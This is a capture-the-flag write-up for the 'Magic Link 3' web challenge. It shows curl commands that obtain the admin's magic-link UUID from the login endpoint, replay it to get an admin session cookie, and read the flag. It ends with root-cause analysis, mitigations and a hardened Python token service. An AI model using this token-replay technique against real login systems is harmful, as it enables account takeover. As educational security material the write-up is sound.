
Magic Link 3

Challenge

Content preserved from the original writeup source. Minimal normalization was applied to fit platform format.

Solution

Original Writeup Content (Preserved)

Magic Link 3 Writeup

Challenge: bluehens-magic-link.chals.io
Category: Web
Points: 100
Flag format: udctf{}

Summary

The application returns a valid login UUID for any registered email through POST /login, including the admin account. Replaying that UUID at /login/<uuid> creates an authenticated session cookie. Visiting /dashboard with that cookie reveals the flag.

Recon

  1. Opened / and observed the magic-link login flow posting to /login.
  2. Submitted admin@udctf.com to /login and received JSON containing a uuid.
  3. Tested the magic-link endpoint with that value: /login/<uuid>.
  4. The response set a signed Flask session cookie for admin@udctf.com and redirected to /dashboard.

Exploitation

1) Request a magic link for the admin account

curl -sS -X POST https://bluehens-magic-link.chals.io/login -d 'email=admin@udctf.com'

Example response:

{
"datetime": "2026-04-17T19:13:54.000000+00:00",
"email": "admin@udctf.com",
"ip-address": "10.1.0.21",
"message": "Magic link generated, check your email.",
"uuid": "dkoU2P4s15I2Z7wo9P-pmQ"
}

2) Replay the UUID to create an authenticated session

curl -sS -i "https://bluehens-magic-link.chals.io/login/dkoU2P4s15I2Z7wo9P-pmQ" -c /tmp/ml3_cookie.txt

Important behavior:

  • 302 redirect to /dashboard
  • Set-Cookie: session=... issued for admin user context

3) Fetch the dashboard with the session cookie

curl -sS -i https://bluehens-magic-link.chals.io/dashboard -b /tmp/ml3_cookie.txt

Response included:

<h1>Welcome Admin</h1>
<p>Flag: udctf{y0u_4r3_m4g1c_l1nk_m4st3r}</p>

Flag

udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Root Cause

  • Sensitive login artifact (uuid) is returned directly to the client.
  • UUID can be replayed immediately as a bearer login token.
  • No additional proof-of-possession step (control of the email inbox) is required before a session is issued.

Mitigations

  1. Never return raw magic-link tokens in API responses.
  2. Deliver login links only through an out-of-band channel (email) and store only a hash of the token server-side.
  3. Bind token use to strict constraints (single use, short TTL, IP/device checks where appropriate).
  4. Add abuse controls (rate limits, anomaly detection, account lock heuristics).
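The following is an added example, not code from the challenge or the original writeup. It sketches what mitigations 1 through 3 look like in a minimal Python token service: the API response carries no token, only a SHA-256 hash of the token is kept server-side, the link is delivered through an assumed `send_email` callback, and redemption enforces a short TTL and single use. The `send_email` callback, the `https://example.test` link base, and the 600-second TTL are assumptions for illustration.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass

TOKEN_TTL_SECONDS = 600  # assumed short lifetime (mitigation 3)


@dataclass
class PendingLink:
    email: str
    expires_at: float
    used: bool = False


class MagicLinkService:
    """Hardened magic-link flow: the raw token never appears in the API response."""

    def __init__(self, registered_emails, send_email):
        self.users = set(registered_emails)
        self.send_email = send_email  # assumed out-of-band mailer: send_email(to, link)
        self.pending = {}             # sha256(token) -> PendingLink; plaintext is never stored

    def request_link(self, email, now=None):
        now = time.time() if now is None else now
        # Identical response for registered and unknown emails, so the endpoint
        # neither leaks the token (mitigation 1) nor confirms which accounts exist.
        response = {"email": email, "message": "Magic link generated, check your email."}
        if email not in self.users:
            return response
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode()).digest()
        self.pending[digest] = PendingLink(email, now + TOKEN_TTL_SECONDS)
        # The email is the only channel that ever carries the token (mitigation 2).
        self.send_email(email, f"https://example.test/login/{token}")
        return response  # note: no "uuid" field

    def redeem(self, token, now=None):
        """Return the email to start a session for, or None if the token is rejected."""
        now = time.time() if now is None else now
        digest = hashlib.sha256(token.encode()).digest()
        link = self.pending.get(digest)
        if link is None or link.used or now > link.expires_at:
            return None
        link.used = True  # single use: replaying the same link a second time fails
        return link.email
```

Because the verifier only ever sees the hash, a database leak does not yield usable login links, and a replayed or expired link is refused at `redeem` rather than turned into a session.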